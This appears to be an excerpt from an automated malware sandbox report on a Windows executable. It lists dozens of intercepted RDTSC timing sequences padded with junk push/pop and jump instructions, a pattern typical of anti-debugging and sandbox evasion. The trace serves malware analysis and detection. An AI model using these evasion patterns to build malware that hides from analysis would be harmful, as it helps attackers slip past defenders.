Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9F9458 second address: 9F945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD72A second address: 9FD757 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F97B4F2EDD4h 0x00000008 jmp 00007F97B4F2EDCEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jnp 00007F97B4F2EDC8h 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F97B4F2EDC6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD757 second address: 9FD79B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jc 00007F97B4EC49CFh 0x00000010 jmp 00007F97B4EC49C9h 0x00000015 pushad 0x00000016 jmp 00007F97B4EC49C8h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD79B second address: 9FD7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD7AA second address: 9FD7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9FD7AE second address: 9FD7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F97B4F2EDCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0429D second address: A042CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F97B4EC49C4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042CC second address: A042F0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDD6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042F0 second address: A042F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A042F9 second address: A042FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A03A3D second address: A03A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A04154 second address: A04159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A07990 second address: A079AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A079AC second address: A079C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A079C9 second address: A079E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F97B4EC49C1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0ABD8 second address: A0AC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F97B4F2EDD9h 0x0000000e pushad 0x0000000f jmp 00007F97B4F2EDD7h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DC97 second address: A0DCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DCB4 second address: A0DCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F97B4F2EDE0h 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0DCE2 second address: A0DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DF5DB second address: 9DF5ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFC14 second address: 9DFC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFD6B second address: 9DFD82 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F97B4F2EDC8h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DFE8D second address: 9DFEB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F97B4EC49BEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F97B4EC49BCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E00D3 second address: 9E0155 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4F2EDC8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F97B4F2EDC8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F97B4F2EDC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 add dword ptr [ebp+122D1D6Eh], edx 0x0000004b jmp 00007F97B4F2EDCFh 0x00000050 mov edi, edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jno 00007F97B4F2EDC6h 0x0000005c jc 00007F97B4F2EDC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E0155 second address: 9E015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07AD second address: 9E07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07B1 second address: 9E07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F97B4EC49BDh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E07E3 second address: 9E0813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD9h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jl 00007F97B4F2EDC8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E0813 second address: 9E0817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E281 second address: A0E2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jns 00007F97B4F2EDE8h 0x00000012 jnp 00007F97B4F2EDCEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E2AE second address: A0E2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E2B2 second address: A0E2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E400 second address: A0E41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F97B4EC49C4h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E556 second address: A0E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F97B4F2EDCFh 0x0000000e jne 00007F97B4F2EDC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E574 second address: A0E587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A0E587 second address: A0E5A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13628 second address: A13645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F97B4EC49C8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13645 second address: A1365B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F97B4F2EDD0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13E14 second address: A13E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F97B4EC49B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A13E2D second address: A13E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A16677 second address: A1667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1667D second address: A16681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A16681 second address: A16693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F97B4EC49BAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A5C9 second address: A1A5EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD0h 0x00000007 jmp 00007F97B4F2EDCEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A5EB second address: A1A5F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F97B4EC49BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A781 second address: A1A7A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F97B4F2EDCBh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A7A6 second address: A1A7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1A7AF second address: A1A7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1AD92 second address: A1AD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F97B4EC49B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A1B2C8 second address: A1B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F97B4F2EDD9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A22607 second address: A2260C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2260C second address: A22617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2603D second address: A2608C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 jmp 00007F97B4EC49C5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F97B4EC49E7h 0x00000014 jmp 00007F97B4EC49C7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2608C second address: A26090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A258DA second address: A258E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A258E4 second address: A25920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDD5h 0x00000011 jmp 00007F97B4F2EDD0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25920 second address: A25932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25D73 second address: A25D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A25D77 second address: A25D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2A266 second address: A2A26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2A26C second address: A2A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 ja 00007F97B4EC49BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jns 00007F97B4EC49B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9B0 second address: A2E9B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9B6 second address: A2E9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9BC second address: A2E9CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F97B4F2EDC8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9CC second address: A2E9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A2E9D0 second address: A2E9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E02F5 second address: 9E02FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A37728 second address: A3773C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F97B4F2EDCBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A358A1 second address: A358A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A358A5 second address: A358B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F97B4F2EDD2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A35A1A second address: A35A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 jnl 00007F97B4EC49B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A35A2A second address: A35A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4F2EDCDh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36402 second address: A36446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F97B4EC49B8h 0x00000019 pushad 0x0000001a popad 0x0000001b jo 00007F97B4EC49BAh 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 jl 00007F97B4EC49B8h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36446 second address: A36450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A366F0 second address: A366F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A366F4 second address: A36706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F97B4F2EDCAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36706 second address: A36717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F97B4EC49B6h 0x00000009 je 00007F97B4EC49B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36717 second address: A36720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A36720 second address: A36724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F648 second address: A3F64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F64E second address: A3F652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3F652 second address: A3F65E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4F2EDC6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E81A second address: A3E837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E837 second address: A3E845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F97B4F2EDC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3E9A8 second address: A3E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A3EC6C second address: A3EC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCEh 0x00000007 jmp 00007F97B4F2EDD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
